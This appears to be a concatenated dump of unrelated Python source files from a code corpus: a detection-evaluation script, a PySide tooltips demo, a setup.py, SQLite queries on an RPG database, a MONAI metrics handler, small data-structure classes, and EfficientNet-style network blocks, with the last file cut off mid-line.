standard_fields.InputDataFields.groundtruth_classes: gt_classes, standard_fields.InputDataFields.groundtruth_difficult: gt_diff} det_dict = { standard_fields.DetectionResultFields.detection_boxes: det_bbox, standard_fields.DetectionResultFields.detection_scores: det_scores, standard_fields.DetectionResultFields.detection_classes: det_classes} if is_vout: image = imread(filename) # Visualization of the results of a detection. image_labeled = np.copy(image) vis_util.visualize_boxes_and_labels_on_image_array( image_labeled, gt_bbox, gt_classes, None, category_index, max_boxes_to_draw=None, min_score_thresh=0, use_normalized_coordinates=True, line_thickness=2) idx_consider = [cid in list_valid_ids for cid in det_classes] vis_util.visualize_boxes_and_labels_on_image_array( image_labeled, det_bbox[idx_consider,:], det_classes[idx_consider], det_scores[idx_consider], category_index, max_boxes_to_draw=None, min_score_thresh=0, use_normalized_coordinates=True, line_thickness=2) vwriter.writeFrame(image_labeled) evaluator.add_single_ground_truth_image_info(filename, ground_dict) evaluator.add_single_detected_image_info(filename, det_dict) eval_result = evaluator.evaluate() print(eval_result) write_metrics(eval_result, output_path) if is_vout: vwriter.close() if __name__ == '__main__': evaluate( gt_dir=FLAGS.gt_dir, det_dir=FLAGS.det_dir, output_dir=FLAGS.output_dir, split=FLAGS.split, label_map_path=FLAGS.label_map_path, is_vout=FLAGS.is_vout, num_class=FLAGS.num_class)
StarcoderdataPython
6618062
<reponame>heylenz/python27<gh_stars>10-100 #!/usr/bin/env python ############################################################################# ## ## Copyright (C) 2004-2005 Trolltech AS. All rights reserved. ## ## This file is part of the example classes of the Qt Toolkit. ## ## This file may be used under the terms of the GNU General Public ## License version 2.0 as published by the Free Software Foundation ## and appearing in the file LICENSE.GPL included in the packaging of ## this file. Please review the following information to ensure GNU ## General Public Licensing requirements will be met: ## http://www.trolltech.com/products/qt/opensource.html ## ## If you are unsure which license is appropriate for your use, please ## review the following information: ## http://www.trolltech.com/products/qt/licensing.html or contact the ## sales department at <EMAIL>. ## ## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE ## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. ## ############################################################################# import random from PySide import QtCore, QtGui import tooltips_rc class ShapeItem(object): def __init__(self): self.myPath = QtGui.QPainterPath() self.myPosition = QtCore.QPoint() self.myColor = QtGui.QColor() self.myToolTip = '' def path(self): return self.myPath def position(self): return self.myPosition def color(self): return self.myColor def toolTip(self): return self.myToolTip def setPath(self, path): self.myPath = path def setToolTip(self, toolTip): self.myToolTip = toolTip def setPosition(self, position): self.myPosition = position def setColor(self, color): self.myColor = color class SortingBox(QtGui.QWidget): circle_count = square_count = triangle_count = 1 def __init__(self): super(SortingBox, self).__init__() self.circlePath = QtGui.QPainterPath() self.squarePath = QtGui.QPainterPath() self.trianglePath = QtGui.QPainterPath() self.shapeItems = [] self.previousPosition = QtCore.QPoint() self.setMouseTracking(True) self.setBackgroundRole(QtGui.QPalette.Base) self.itemInMotion = None self.newCircleButton = self.createToolButton("New Circle", QtGui.QIcon(':/images/circle.png'), self.createNewCircle) self.newSquareButton = self.createToolButton("New Square", QtGui.QIcon(':/images/square.png'), self.createNewSquare) self.newTriangleButton = self.createToolButton("New Triangle", QtGui.QIcon(':/images/triangle.png'), self.createNewTriangle) self.circlePath.addEllipse(0, 0, 100, 100) self.squarePath.addRect(0, 0, 100, 100) x = self.trianglePath.currentPosition().x() y = self.trianglePath.currentPosition().y() self.trianglePath.moveTo(x + 120 / 2, y) self.trianglePath.lineTo(0, 100) self.trianglePath.lineTo(120, 100) self.trianglePath.lineTo(x + 120 / 2, y) self.setWindowTitle("Tooltips") self.resize(500, 300) self.createShapeItem(self.circlePath, "Circle", self.initialItemPosition(self.circlePath), self.initialItemColor()) self.createShapeItem(self.squarePath, "Square", self.initialItemPosition(self.squarePath), self.initialItemColor()) self.createShapeItem(self.trianglePath, "Triangle", self.initialItemPosition(self.trianglePath), self.initialItemColor()) def event(self, event): if event.type() == QtCore.QEvent.ToolTip: helpEvent = event index = self.itemAt(helpEvent.pos()) if index != -1: QtGui.QToolTip.showText(helpEvent.globalPos(), self.shapeItems[index].toolTip()) else: QtGui.QToolTip.hideText() event.ignore() return True return super(SortingBox, self).event(event) def resizeEvent(self, event): margin = self.style().pixelMetric(QtGui.QStyle.PM_DefaultTopLevelMargin) x = self.width() - margin y = self.height() - margin y = self.updateButtonGeometry(self.newCircleButton, x, y) y = self.updateButtonGeometry(self.newSquareButton, x, y) self.updateButtonGeometry(self.newTriangleButton, x, y) def paintEvent(self, event): painter = QtGui.QPainter(self) painter.setRenderHint(QtGui.QPainter.Antialiasing) for shapeItem in self.shapeItems: painter.translate(shapeItem.position()) painter.setBrush(shapeItem.color()) painter.drawPath(shapeItem.path()) painter.translate(-shapeItem.position()) def mousePressEvent(self, event): if event.button() == QtCore.Qt.LeftButton: index = self.itemAt(event.pos()) if index != -1: self.itemInMotion = self.shapeItems[index] self.previousPosition = event.pos() value = self.shapeItems[index] del self.shapeItems[index] self.shapeItems.insert(len(self.shapeItems) - 1, value) self.update() def mouseMoveEvent(self, event): if (event.buttons() & QtCore.Qt.LeftButton) and self.itemInMotion: self.moveItemTo(event.pos()) def mouseReleaseEvent(self, event): if (event.button() == QtCore.Qt.LeftButton) and self.itemInMotion: self.moveItemTo(event.pos()) self.itemInMotion = None def createNewCircle(self): SortingBox.circle_count += 1 self.createShapeItem(self.circlePath, "Circle <%d>" % SortingBox.circle_count, self.randomItemPosition(), self.randomItemColor()) def createNewSquare(self): SortingBox.square_count += 1 self.createShapeItem(self.squarePath, "Square <%d>" % SortingBox.square_count, self.randomItemPosition(), self.randomItemColor()) def createNewTriangle(self): SortingBox.triangle_count += 1 self.createShapeItem(self.trianglePath, "Triangle <%d>" % SortingBox.triangle_count, self.randomItemPosition(), self.randomItemColor()) def itemAt(self, pos): for i in range(len(self.shapeItems) - 1, -1, -1): item = self.shapeItems[i] if item.path().contains(QtCore.QPointF(pos - item.position())): return i return -1 def moveItemTo(self, pos): offset = pos - self.previousPosition self.itemInMotion.setPosition(self.itemInMotion.position() + offset) self.previousPosition = QtCore.QPoint(pos) self.update() def updateButtonGeometry(self, button, x, y): size = button.sizeHint() button.setGeometry(x - size.width(), y - size.height(), size.width(), size.height()) return y - size.height() - self.style().pixelMetric(QtGui.QStyle.PM_DefaultLayoutSpacing) def createShapeItem(self, path, toolTip, pos, color): shapeItem = ShapeItem() shapeItem.setPath(path) shapeItem.setToolTip(toolTip) shapeItem.setPosition(pos) shapeItem.setColor(color) self.shapeItems.append(shapeItem) self.update() def createToolButton(self, toolTip, icon, member): button = QtGui.QToolButton(self) button.setToolTip(toolTip) button.setIcon(icon) button.setIconSize(QtCore.QSize(32, 32)) button.clicked.connect(member) return button def initialItemPosition(self, path): y = (self.height() - path.controlPointRect().height()) / 2 if len(self.shapeItems) == 0: x = ((3 * self.width()) / 2 - path.controlPointRect().width()) / 2 else: x = (self.width() / len(self.shapeItems) - path.controlPointRect().width()) / 2 return QtCore.QPoint(x, y) def randomItemPosition(self): x = random.randint(0, self.width() - 120) y = random.randint(0, self.height() - 120) return QtCore.QPoint(x, y) def initialItemColor(self): hue = ((len(self.shapeItems) + 1) * 85) % 256 return QtGui.QColor.fromHsv(hue, 255, 190) def randomItemColor(self): return QtGui.QColor.fromHsv(random.randint(0, 256), 255, 190) if __name__ == "__main__": import sys app = QtGui.QApplication(sys.argv) sortingBox = SortingBox() sortingBox.show() sys.exit(app.exec_())
StarcoderdataPython
9632252
<gh_stars>0 #!/usr/bin/env python3 import os from setuptools import setup, find_packages # Utility function to read the README file. # Used for the long_description. It's nice, because now 1) we have a top level # README file and 2) it's easier to type in the README file than to put a raw # string in below ... def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() # requirements.txt Notes # Create requirements.txt file command: pip freeze > requirements.txt # Install requirements.txt file command: pip -r install requirements.txt # Utility function to read REQUIREMENTS.txt inside a virtual env # Parses requirements.txt into a list of requirements for the install_requires option. def requires(fname): with open(os.path.join(os.path.dirname(__file__), fname)) as f: content = f.readlines() content = [x.strip() for x in content] #Takes /n off each line return content setup( name='text-sentiment', version='0.1.0', packages=find_packages(exclude=['tests',]), install_requires=requires('requirements.txt'), #All modules associated with package license='Public Domain', long_description=read('README'), #url='https://example.com', #To github #download_url='https://example.com', #Tarball download author='<NAME>', author_email='<EMAIL>' entry_points={ 'console_scripts': ['text-sentiment=text_sentiment.app:main'], }, )
StarcoderdataPython
1625224
import sqlite3 # establish a connection with the desired database conn = sqlite3.connect('rpg_db.sqlite3') conn # (optional) test the output # create a cursor -> curs = conn.cursor() -> see loop below # query for the total number of characters query = 'SELECT COUNT(DISTINCT character_id) FROM charactercreator_character;' # queries for the number of characters per subclass query2a = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_necromancer ON character_id = mage_ptr_id' query2b = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_mage ON character_id = character_ptr_id' query2c = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_cleric ON character_id = character_ptr_id' query2d = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_fighter ON character_id = character_ptr_id' query2e = 'SELECT COUNT(DISTINCT name) FROM charactercreator_character INNER JOIN charactercreator_theif ON character_id = character_ptr_id' # query for the total number of items query3 = 'SELECT COUNT(item_id) FROM charactercreator_character_inventory;' # query for the total number of weapons query4 = 'SELECT COUNT(*) FROM armory_item INNER JOIN armory_weapon ON item_id = item_ptr_id;' # query for the number of items held by each character query5 = 'SELECT character_id, COUNT(item_id) FROM charactercreator_character_inventory GROUP BY character_id LIMIT 20' # query for the number of weapons held by each character query6 = 'SELECT character_id, COUNT(item_id) FROM charactercreator_character_inventory INNER JOIN armory_weapon ON item_id = item_ptr_id GROUP BY character_id LIMIT 20;' # query for the average number of items held by characters query7 = 'SELECT AVG(count) FROM(SELECT COUNT(item_id) AS count FROM charactercreator_character_inventory GROUP BY character_id);' # query for the average number of weapons held by characters query8 = 'SELECT AVG(count) FROM(SELECT COUNT(item_id) AS count FROM charactercreator_character_inventory INNER JOIN armory_weapon ON item_id = item_ptr_id GROUP BY character_id);' # execute the queries; 'define-a-function' route show below queries = [query, query2a, query2b, query2c, query2d, query2e, query3, query4, query5, query6, query7, query8 ]
StarcoderdataPython
195106
<reponame>tatuanb/monai_V1 # Copyright 2020 - 2021 MONAI Consortium # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import TYPE_CHECKING, Callable, List, Optional, Sequence, Union from monai.config import IgniteInfo from monai.data import decollate_batch from monai.handlers.utils import write_metrics_reports from monai.utils import ImageMetaKey as Key from monai.utils import ensure_tuple, min_version, optional_import, string_list_all_gather Events, _ = optional_import("ignite.engine", IgniteInfo.OPT_IMPORT_VERSION, min_version, "Events") idist, _ = optional_import("ignite", IgniteInfo.OPT_IMPORT_VERSION, min_version, "distributed") if TYPE_CHECKING: from ignite.engine import Engine else: Engine, _ = optional_import("ignite.engine", IgniteInfo.OPT_IMPORT_VERSION, min_version, "Engine") class MetricsSaver: """ ignite handler to save metrics values and details into expected files. Args: save_dir: directory to save the metrics and metric details. metrics: expected final metrics to save into files, can be: None, "*" or list of strings. None - don't save any metrics into files. "*" - save all the existing metrics in `engine.state.metrics` dict into separate files. list of strings - specify the expected metrics to save. default to "*" to save all the metrics into `metrics.csv`. metric_details: expected metric details to save into files, the data comes from `engine.state.metric_details`, which should be provided by different `Metrics`, typically, it's some intermediate values in metric computation. for example: mean dice of every channel of every image in the validation dataset. it must contain at least 2 dims: (batch, classes, ...), if not, will unsqueeze to 2 dims. this arg can be: None, "*" or list of strings. None - don't save any metric_details into files. "*" - save all the existing metric_details in `engine.state.metric_details` dict into separate files. list of strings - specify the metric_details of expected metrics to save. if not None, every metric_details array will save a separate `{metric name}_raw.csv` file. batch_transform: a callable that is used to extract the `meta_data` dictionary of the input images from `ignite.engine.state.batch` if saving metric details. the purpose is to get the input filenames from the `meta_data` and store with metric details together. `engine.state` and `batch_transform` inherit from the ignite concept: https://pytorch.org/ignite/concepts.html#state, explanation and usage example are in the tutorial: https://github.com/Project-MONAI/tutorials/blob/master/modules/batch_output_transform.ipynb. summary_ops: expected computation operations to generate the summary report. it can be: None, "*" or list of strings, default to None. None - don't generate summary report for every expected metric_details. "*" - generate summary report for every metric_details with all the supported operations. list of strings - generate summary report for every metric_details with specified operations, they should be within list: ["mean", "median", "max", "min", "<int>percentile", "std", "notnans"]. the number in "<int>percentile" should be [0, 100], like: "15percentile". default: "90percentile". for more details, please check: https://numpy.org/doc/stable/reference/generated/numpy.nanpercentile.html. note that: for the overall summary, it computes `nanmean` of all classes for each image first, then compute summary. example of the generated summary report:: class mean median max 5percentile 95percentile notnans class0 6.0000 6.0000 7.0000 5.1000 6.9000 2.0000 class1 6.0000 6.0000 6.0000 6.0000 6.0000 1.0000 mean 6.2500 6.2500 7.0000 5.5750 6.9250 2.0000 save_rank: only the handler on specified rank will save to files in multi-gpus validation, default to 0. delimiter: the delimiter character in CSV file, default to "\t". output_type: expected output file type, supported types: ["csv"], default to "csv". """ def __init__( self, save_dir: str, metrics: Optional[Union[str, Sequence[str]]] = "*", metric_details: Optional[Union[str, Sequence[str]]] = None, batch_transform: Callable = lambda x: x, summary_ops: Optional[Union[str, Sequence[str]]] = None, save_rank: int = 0, delimiter: str = "\t", output_type: str = "csv", ) -> None: self.save_dir = save_dir self.metrics = ensure_tuple(metrics) if metrics is not None else None self.metric_details = ensure_tuple(metric_details) if metric_details is not None else None self.batch_transform = batch_transform self.summary_ops = ensure_tuple(summary_ops) if summary_ops is not None else None self.save_rank = save_rank self.deli = delimiter self.output_type = output_type self._filenames: List[str] = [] def attach(self, engine: Engine) -> None: """ Args: engine: Ignite Engine, it can be a trainer, validator or evaluator. """ engine.add_event_handler(Events.EPOCH_STARTED, self._started) engine.add_event_handler(Events.ITERATION_COMPLETED, self._get_filenames) engine.add_event_handler(Events.EPOCH_COMPLETED, self) def _started(self, _engine: Engine) -> None: """ Initialize internal buffers. Args: _engine: Ignite Engine, unused argument. """ self._filenames = [] def _get_filenames(self, engine: Engine) -> None: if self.metric_details is not None: meta_data = self.batch_transform(engine.state.batch) if isinstance(meta_data, dict): # decollate the `dictionary of list` to `list of dictionaries` meta_data = decollate_batch(meta_data) for m in meta_data: self._filenames.append(f"{m.get(Key.FILENAME_OR_OBJ)}") def __call__(self, engine: Engine) -> None: """ Args: engine: Ignite Engine, it can be a trainer, validator or evaluator. """ ws = idist.get_world_size() if self.save_rank >= ws: raise ValueError("target save rank is greater than the distributed group size.") # all gather file names across ranks _images = string_list_all_gather(strings=self._filenames) if ws > 1 else self._filenames # only save metrics to file in specified rank if idist.get_rank() == self.save_rank: _metrics = {} if self.metrics is not None and len(engine.state.metrics) > 0: _metrics = {k: v for k, v in engine.state.metrics.items() if k in self.metrics or "*" in self.metrics} _metric_details = {} if hasattr(engine.state, "metric_details"): details = engine.state.metric_details # type: ignore if self.metric_details is not None and len(details) > 0: for k, v in details.items(): if k in self.metric_details or "*" in self.metric_details: _metric_details[k] = v write_metrics_reports( save_dir=self.save_dir, images=None if len(_images) == 0 else _images, metrics=_metrics, metric_details=_metric_details, summary_ops=self.summary_ops, deli=self.deli, output_type=self.output_type, )
StarcoderdataPython
6412617
N = int(input()) D, X = map(int, input().split()) A = [int(input()) for _ in range(N)] ans = X for a in A: if D % a == 0: ans -= 1 ans += 1 + D // a print(ans)
StarcoderdataPython
3447504
""" Enhanced functions for list. This enhanced list is strictly typed """ from typing import Generic, TypeVar, Iterable, List # generics datatype Type = TypeVar("T") class EnhancedList(list, Generic[Type]): """ extends list of a gerneric type """ def __init__(self, *args: Iterable[Type]): """ create a list type """ list.__init__(self, *args) def __getitem__(self, key): """ receive one or multiple elements from list. If the key argument is of type "list" then this function returns a EnhancedList, the stored value else Arguments: key: int, List[int] or List[List[int]] Returns: value: EnhancedList or EnhancedList element """ if isinstance(key, list): return EnhancedList([self[i] for i in key]) return list.__getitem__(self, key) def reject_indices(self, indices: List[int]): """ remove the elements utilizing a list Arguments: indices: List[int] Returns: list without rejected elements: EnhancedList """ tmp_list = [] for i, elem in enumerate(self): if i not in indices: tmp_list.append(elem) return EnhancedList(tmp_list)
StarcoderdataPython
17806
""" A fixed-capacity queue implemented as circular queue. Queue can become full. * enqueue is O(1) * dequeue is O(1) """ class Queue: """ Implementation of a Queue using a circular buffer. """ def __init__(self, size): self.size = size self.storage = [None] * size self.first = 0 self.last = 0 self.N = 0 def is_empty(self): """ Determine if queue is empty. """ return self.N == 0 def is_full(self): """ Determine if queue is full. """ return self.N == self.size def enqueue(self, item): """ Enqueue new item to end of queue. """ if self.is_full(): raise RuntimeError('Queue is full') self.storage[self.last] = item self.N += 1 self.last = (self.last + 1) % self.size def dequeue(self): """ Remove and return first item from queue. """ if self.is_empty(): raise RuntimeError('Queue is empty') val = self.storage[self.first] self.N -= 1 self.first = (self.first + 1) % self.size return val
StarcoderdataPython
6620245
""" EfficientNet, MobileNetV3, etc Blocks Hacked together by / Copyright 2020 <NAME> """ import math import torch import torch.nn as nn from torch.nn import functional as F from .layers import create_conv2d, drop_path, get_act_layer from .layers.activations import sigmoid # Defaults used for Google/Tensorflow training of mobile networks /w RMSprop as per # papers and TF reference implementations. PT momentum equiv for TF decay is (1 - TF decay) # NOTE: momentum varies btw .99 and .9997 depending on source # .99 in official TF TPU impl # .9997 (/w .999 in search space) for paper BN_MOMENTUM_TF_DEFAULT = 1 - 0.99 BN_EPS_TF_DEFAULT = 1e-3 _BN_ARGS_TF = dict(momentum=BN_MOMENTUM_TF_DEFAULT, eps=BN_EPS_TF_DEFAULT) def get_bn_args_tf(): return _BN_ARGS_TF.copy() def resolve_bn_args(kwargs): bn_args = get_bn_args_tf() if kwargs.pop('bn_tf', False) else {} bn_momentum = kwargs.pop('bn_momentum', None) if bn_momentum is not None: bn_args['momentum'] = bn_momentum bn_eps = kwargs.pop('bn_eps', None) if bn_eps is not None: bn_args['eps'] = bn_eps return bn_args _SE_ARGS_DEFAULT = dict( gate_fn=sigmoid, act_layer=None, reduce_mid=False, divisor=1) def resolve_se_args(kwargs, in_chs, act_layer=None): se_kwargs = kwargs.copy() if kwargs is not None else {} # fill in args that aren't specified with the defaults for k, v in _SE_ARGS_DEFAULT.items(): se_kwargs.setdefault(k, v) # some models, like MobilNetV3, calculate SE reduction chs from the containing block's mid_ch instead of in_ch if not se_kwargs.pop('reduce_mid'): se_kwargs['reduced_base_chs'] = in_chs # act_layer override, if it remains None, the containing block's act_layer will be used if se_kwargs['act_layer'] is None: assert act_layer is not None se_kwargs['act_layer'] = act_layer return se_kwargs def resolve_act_layer(kwargs, default='relu'): act_layer = kwargs.pop('act_layer', default) if isinstance(act_layer, str): act_layer = get_act_layer(act_layer) return act_layer def make_divisible(v, divisor=8, min_value=None): min_value = min_value or divisor new_v = max(min_value, int(v + divisor / 2) // divisor * divisor) # Make sure that round down does not go down by more than 10%. if new_v < 0.9 * v: new_v += divisor return new_v def round_channels(channels, multiplier=1.0, divisor=8, channel_min=None): """Round number of filters based on depth multiplier.""" if not multiplier: return channels channels *= multiplier return make_divisible(channels, divisor, channel_min) class ChannelShuffle(nn.Module): # FIXME haven't used yet def __init__(self, groups): super(ChannelShuffle, self).__init__() self.groups = groups def forward(self, x): """Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,w] -> [N,C,H,W]""" N, C, H, W = x.size() g = self.groups assert C % g == 0, "Incompatible group size {} for input channel {}".format( g, C ) return ( x.view(N, g, int(C / g), H, W) .permute(0, 2, 1, 3, 4) .contiguous() .view(N, C, H, W) ) class SqueezeExcite(nn.Module): def __init__(self, in_chs, se_ratio=0.25, reduced_base_chs=None, act_layer=nn.ReLU, gate_fn=sigmoid, divisor=1, **_): super(SqueezeExcite, self).__init__() reduced_chs = make_divisible((reduced_base_chs or in_chs) * se_ratio, divisor) self.conv_reduce = nn.Conv2d(in_chs, reduced_chs, 1, bias=True) self.act1 = act_layer(inplace=True) self.conv_expand = nn.Conv2d(reduced_chs, in_chs, 1, bias=True) self.gate_fn = gate_fn def forward(self, x): x_se = x.mean((2, 3), keepdim=True) x_se = self.conv_reduce(x_se) x_se = self.act1(x_se) x_se = self.conv_expand(x_se) return x * self.gate_fn(x_se) class ConvBnAct(nn.Module): def __init__(self, in_chs, out_chs, kernel_size, stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d, norm_kwargs=None): super(ConvBnAct, self).__init__() norm_kwargs = norm_kwargs or {} self.conv = create_conv2d(in_chs, out_chs, kernel_size, stride=stride, dilation=dilation, padding=pad_type) self.bn1 = norm_layer(out_chs, **norm_kwargs) self.act1 = act_layer(inplace=True) def feature_info(self, location): if location == 'expansion': # output of conv after act, same as block coutput info = dict(module='act1', hook_type='forward', num_chs=self.conv.out_channels) else: # location == 'bottleneck', block output info = dict(module='', hook_type='', num_chs=self.conv.out_channels) return info def forward(self, x): x = self.conv(x) x = self.bn1(x) x = self.act1(x) return x class DepthwiseSeparableConv(nn.Module): """ DepthwiseSeparable block Used for DS convs in MobileNet-V1 and in the place of IR blocks that have no expansion (factor of 1.0). This is an alternative to having a IR with an optional first pw conv. """ def __init__(self, in_chs, out_chs, dw_kernel_size=3, stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, pw_kernel_size=1, pw_act=False, se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None, drop_path_rate=0.): super(DepthwiseSeparableConv, self).__init__() norm_kwargs = norm_kwargs or {} has_se = se_ratio is not None and se_ratio > 0. self.has_residual = (stride == 1 and in_chs == out_chs) and not noskip self.has_pw_act = pw_act # activation after point-wise conv self.drop_path_rate = drop_path_rate self.conv_dw = create_conv2d( in_chs, in_chs, dw_kernel_size, stride=stride, dilation=dilation, padding=pad_type, depthwise=True) self.bn1 = norm_layer(in_chs, **norm_kwargs) self.act1 = act_layer(inplace=True) # Squeeze-and-excitation if has_se: se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer) self.se = SqueezeExcite(in_chs, se_ratio=se_ratio, **se_kwargs) else: self.se = None self.conv_pw = create_conv2d(in_chs, out_chs, pw_kernel_size, padding=pad_type) self.bn2 = norm_layer(out_chs, **norm_kwargs) self.act2 = act_layer(inplace=True) if self.has_pw_act else nn.Identity() def feature_info(self, location): if location == 'expansion': # after SE, input to PW info = dict(module='conv_pw', hook_type='forward_pre', num_chs=self.conv_pw.in_channels) else: # location == 'bottleneck', block output info = dict(module='', hook_type='', num_chs=self.conv_pw.out_channels) return info def forward(self, x): residual = x x = self.conv_dw(x) x = self.bn1(x) x = self.act1(x) if self.se is not None: x = self.se(x) x = self.conv_pw(x) x = self.bn2(x) x = self.act2(x) if self.has_residual: if self.drop_path_rate > 0.: x = drop_path(x, self.drop_path_rate, self.training) x += residual return x class FinalLayer(nn.Module): def __init__(self, in_chs, num_features, pad_type, norm_kwargs, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU6): super(FinalLayer, self).__init__() self._in_chs = in_chs self.num_features = num_features norm_kwargs = norm_kwargs or {} self.conv_head = create_conv2d(self._in_chs, self.num_features, 1, padding=pad_type) self.bn2 = norm_layer(self.num_features, **norm_kwargs) self.act2 = act_layer(inplace=True) def forward(self, x): x = self.conv_head(x) x = self.bn2(x) x = self.act2(x) return x class InvertedResidual_easy(nn.Module): def __init__(self, in_chs, num_features, pad_type, norm_kwargs, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU6): super(InvertedResidual_easy, self).__init__() self._in_chs = in_chs self.num_features = num_features norm_kwargs = norm_kwargs or {} self.conv_head = create_conv2d(self._in_chs, self.num_features, 1, padding=pad_type) self.bn2 = norm_layer(self.num_features, **norm_kwargs) self.act2 = act_layer(inplace=True) def forward(self, x): x = self.conv_head(x) x = self.bn2(x) x = self.act2(x) return x class InvertedResidual(nn.Module): """ Inverted residual block w/ optional SE and CondConv routing""" def __init__(self, in_chs, out_chs, dw_kernel_size=3, stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1, se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None, conv_kwargs=None, drop_path_rate=0.): super(InvertedResidual, self).__init__() norm_kwargs = norm_kwargs or {} conv_kwargs = conv_kwargs or {} mid_chs = make_divisible(in_chs * exp_ratio) has_se = se_ratio is not None and se_ratio > 0. self.has_residual = (in_chs == out_chs and stride == 1) and not noskip self.drop_path_rate = drop_path_rate # Point-wise expansion self.conv_pw = create_conv2d(in_chs, mid_chs, exp_kernel_size, padding=pad_type, **conv_kwargs) self.bn1 = norm_layer(mid_chs, **norm_kwargs) self.act1 = act_layer(inplace=True) # Depth-wise convolution self.conv_dw = create_conv2d( mid_chs, mid_chs, dw_kernel_size, stride=stride, dilation=dilation, padding=pad_type, depthwise=True, **conv_kwargs) self.bn2 = norm_layer(mid_chs, **norm_kwargs) self.act2 = act_layer(inplace=True) # Squeeze-and-excitation if has_se: se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer) self.se = SqueezeExcite(mid_chs, se_ratio=se_ratio, **se_kwargs) else: self.se = None # Point-wise linear projection self.conv_pwl = create_conv2d(mid_chs, out_chs, pw_kernel_size, padding=pad_type, **conv_kwargs) self.bn3 = norm_layer(out_chs, **norm_kwargs) def feature_info(self, location): if location == 'expansion': # after SE, input to PWL info = dict(module='conv_pwl', hook_type='forward_pre', num_chs=self.conv_pwl.in_channels) else: # location == 'bottleneck', block output info = dict(module='', hook_type='', num_chs=self.conv_pwl.out_channels) return info def forward(self, x): residual = x # Point-wise expansion x = self.conv_pw(x) x = self.bn1(x) x = self.act1(x) # Depth-wise convolution x = self.conv_dw(x) x = self.bn2(x) x = self.act2(x) # Squeeze-and-excitation if self.se is not None: x = self.se(x) # Point-wise linear projection x = self.conv_pwl(x) x = self.bn3(x) if self.has_residual: if self.drop_path_rate > 0.: x = drop_path(x, self.drop_path_rate, self.training) x += residual return x class I2RGhostBlock(nn.Module): """ Mobile Inverted Residual Bottleneck Block Args: block_args (namedtuple): BlockArgs, see above global_params (namedtuple): GlobalParam, see above Attributes: has_se (bool): Whether the block contains a Squeeze and Excitation layer. """ def __init__(self, in_chs, out_chs, dw_kernel_size=3, stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1, se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None, conv_kwargs=None, drop_path_rate=0., keep_3x3=False, group_1x1=1): super().__init__() norm_kwargs = norm_kwargs or {} conv_kwargs = conv_kwargs or {} mid_chs = make_divisible(in_chs * exp_ratio) self.has_se = se_ratio is not None and se_ratio > 0. self.has_residual = (in_chs == out_chs and stride == 1) and not noskip self.drop_path_rate = drop_path_rate self.expand_ratio = exp_ratio # Get static or dynamic convolution depending on image size # Conv2d = get_same_padding_conv2d(image_size=global_params.image_size) Conv2d = nn.Conv2d # Expansion phase inp = in_chs oup = in_chs // self.expand_ratio # number of output channels final_oup = out_chs self.inp, self.final_oup = inp, final_oup self.identity = False if oup < oup / 6.: oup = math.ceil(oup / 6.) oup = make_divisible(oup, 16) oup = make_divisible(oup, 2) k = dw_kernel_size s = stride # apply repeat scheme self.split_ratio = 2 self.ghost_idx_inp = inp // self.split_ratio self.ghost_idx_oup = int(final_oup - self.ghost_idx_inp) self.inp, self.final_oup, self.s = inp, final_oup, s # if self._block_args.expand_ratio != 1: # self._expand_conv = Conv2d(in_channels=inp, out_channels=oup, kernel_size=1, bias=False) # self._bn0 = nn.BatchNorm2d(num_features=oup, momentum=self._bn_mom, eps=self._bn_eps) if self.expand_ratio == 2: # self.features = nn.Sequential( self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2, bias=False, groups=in_chs) self.bn1 = norm_layer(in_chs, **norm_kwargs) self.act = act_layer(inplace=True) # first linear layer self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False) self.bn2 = norm_layer(oup, **norm_kwargs) # sec linear layer self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False) self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs) # act_layer(inplace=True), # expand layer self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2, bias=False, groups=final_oup, stride=s) self.bn4 = norm_layer(final_oup, **norm_kwargs) # ) elif inp != final_oup and s == 1: # self.features=nn.Sequential( self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False) self.bn2 = norm_layer(oup, **norm_kwargs) # only two linear layers are needed self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False, groups=group_1x1) self.bn3 = norm_layer(final_oup, **norm_kwargs) self.act = act_layer(inplace=True) # ) elif in_chs != final_oup and s == 2: # self.features = nn.Sequential( self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False) self.bn2 = norm_layer(oup, **norm_kwargs) self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False) self.bn3 = norm_layer(final_oup, 